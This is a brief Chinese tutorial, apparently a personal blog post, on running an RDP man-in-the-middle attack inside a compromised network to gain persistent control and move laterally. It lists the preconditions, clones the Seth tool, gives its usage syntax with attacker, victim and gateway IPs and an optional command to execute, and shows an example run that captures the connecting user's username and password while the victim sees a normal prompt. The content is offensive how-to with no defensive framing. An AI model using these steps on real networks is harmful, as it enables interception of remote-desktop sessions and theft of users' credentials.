RDP中间人攻击

前言：靠着网上的资源一点一点的啃。

内网渗透中，发觉有机器开了远程桌面，可以使用RDP中间人攻击进行持久控制和横向渗透。
攻击成功具备的条件

1. 同一个网段
2. 知道连接者ip,被连接ip。
   工具：Seth

git clone https://github.com/SySS-Research/Seth.git

使用方法

./seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [<COMMAND>]

用法介绍：
INTERFACE：网卡
ATTACKER IP：中间人ip
VICTIM IP：连接者ip
GATEWAY IP|HOST IP：被连接ip
COMMAND：启动时执行的命令

./seth.sh eth0 192.168.202.{133,1,135}

连接时像正常的提示

获取到用户名和密码